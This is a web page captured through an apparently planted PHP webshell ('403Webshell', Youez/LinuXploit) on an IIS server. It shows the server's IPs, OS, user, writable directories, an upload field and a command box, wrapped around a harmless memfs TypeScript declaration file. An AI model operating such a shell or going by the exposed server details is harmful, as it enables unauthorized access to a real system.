403Webshell
Server IP : 185.208.173.17  /  Your IP : 87.236.161.98
Web Server : Microsoft-IIS/10.0
System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64
User : IUSR ( 0)
PHP Version : 7.4.13
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/parsmega.nuxt/node_modules/memfs/lib/node/types/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/parsmega.nuxt/node_modules/memfs/lib/node/types/FsPromisesApi.d.ts
import type { constants } from '../../constants';
import * as misc from './misc';
import * as opts from './options';
export interface FsPromisesApi {
    constants: typeof constants;
    FileHandle: new (...args: unknown[]) => misc.IFileHandle;
    access: (path: misc.PathLike, mode?: number) => Promise<void>;
    appendFile: (path: misc.TFileHandle, data: misc.TData, options?: opts.IAppendFileOptions | string) => Promise<void>;
    chmod: (path: misc.PathLike, mode: misc.TMode) => Promise<void>;
    chown: (path: misc.PathLike, uid: number, gid: number) => Promise<void>;
    copyFile: (src: misc.PathLike, dest: misc.PathLike, flags?: misc.TFlagsCopy) => Promise<void>;
    cp: (src: string | URL, dest: string | URL, options?: opts.ICpOptions) => Promise<void>;
    lchmod: (path: misc.PathLike, mode: misc.TMode) => Promise<void>;
    lchown: (path: misc.PathLike, uid: number, gid: number) => Promise<void>;
    lutimes: (path: misc.PathLike, atime: misc.TTime, mtime: misc.TTime) => Promise<void>;
    link: (existingPath: misc.PathLike, newPath: misc.PathLike) => Promise<void>;
    lstat: (path: misc.PathLike, options?: opts.IStatOptions) => Promise<misc.IStats>;
    mkdir: (path: misc.PathLike, options?: misc.TMode | opts.IMkdirOptions) => Promise<string | undefined>;
    mkdtemp: (prefix: string, options?: opts.IOptions) => Promise<misc.TDataOut>;
    open: (path: misc.PathLike, flags?: misc.TFlags, mode?: misc.TMode) => Promise<misc.IFileHandle>;
    opendir: (path: misc.PathLike, options?: opts.IOpendirOptions) => Promise<misc.IDir>;
    readdir: (path: misc.PathLike, options?: opts.IReaddirOptions | string) => Promise<misc.TDataOut[] | misc.IDirent[]>;
    readFile: (id: misc.TFileHandle, options?: opts.IReadFileOptions | string) => Promise<misc.TDataOut>;
    readlink: (path: misc.PathLike, options?: opts.IOptions) => Promise<misc.TDataOut>;
    realpath: (path: misc.PathLike, options?: opts.IRealpathOptions | string) => Promise<misc.TDataOut>;
    rename: (oldPath: misc.PathLike, newPath: misc.PathLike) => Promise<void>;
    rmdir: (path: misc.PathLike, options?: opts.IRmdirOptions) => Promise<void>;
    rm: (path: misc.PathLike, options?: opts.IRmOptions) => Promise<void>;
    stat: (path: misc.PathLike, options?: opts.IStatOptions) => Promise<misc.IStats>;
    statfs: (path: misc.PathLike, options?: opts.IStatOptions) => Promise<misc.IStatFs>;
    symlink: (target: misc.PathLike, path: misc.PathLike, type?: misc.symlink.Type) => Promise<void>;
    truncate: (path: misc.PathLike, len?: number) => Promise<void>;
    unlink: (path: misc.PathLike) => Promise<void>;
    utimes: (path: misc.PathLike, atime: misc.TTime, mtime: misc.TTime) => Promise<void>;
    watch: (filename: misc.PathLike, options?: opts.IWatchOptions) => AsyncIterableIterator<{
        eventType: string;
        filename: string | Buffer;
    }>;
    writeFile: (id: misc.TFileHandle, data: misc.TPromisesData, options?: opts.IWriteFileOptions) => Promise<void>;
    glob: (pattern: string, options?: opts.IGlobOptions) => Promise<string[]>;
}

Youez - 2016 - github.com/yon3zu
LinuXploit